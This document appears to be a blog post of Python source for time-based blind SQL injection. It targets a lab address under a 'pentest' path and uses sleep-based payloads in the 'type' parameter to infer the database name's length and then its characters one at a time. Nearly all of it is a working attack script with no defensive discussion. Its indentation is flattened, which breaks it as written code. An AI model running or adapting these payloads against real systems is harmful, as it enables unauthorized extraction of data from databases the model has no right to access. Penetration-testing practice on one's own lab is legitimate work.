#!D:\Typora\python
import requests
import time
import datetime
#获取数据库长度
def database_len():
#存放跑出的结果
length=0
database=''
print ("start get length...")
for l in range(1,15):
startTime1=time.time()
url1 = "http://172.20.10.14/pentest/test/time/?type=1 and if(length(database())=%d,sleep(1),1)"%(l)
response1 = requests.get(url1)
if time.time() - startTime1 > 1:
length+=l
print ("the length :" , str(length))
# break
print ("start database sql injection...")
database_len()
#获取数据库名
def database_name():
name = ''
for j in range(1, 15): #根据数据库名长度自行修改15这个数值
for i in '0123456789abcdefghijklmnopqrstuvwxyz':
url = '''http://172.20.10.14/pentest/test/time/'''
payload = '''?type=if(substr(database(),%d,1)='%s',sleep(2),1)''' % (
j, i)
# print(url+payload+'%23')
time1 = datetime.datetime.now()
r = requests.get(url + payload + '%23')
time2 = datetime.datetime.now()
sec = (time2 - time1).seconds
if sec >= 2:
name += i
print(name)
break
print('database_name:', name)
database_name()
SQL盲注python脚本源码
最新推荐文章于 2024-04-24 20:45:00 发布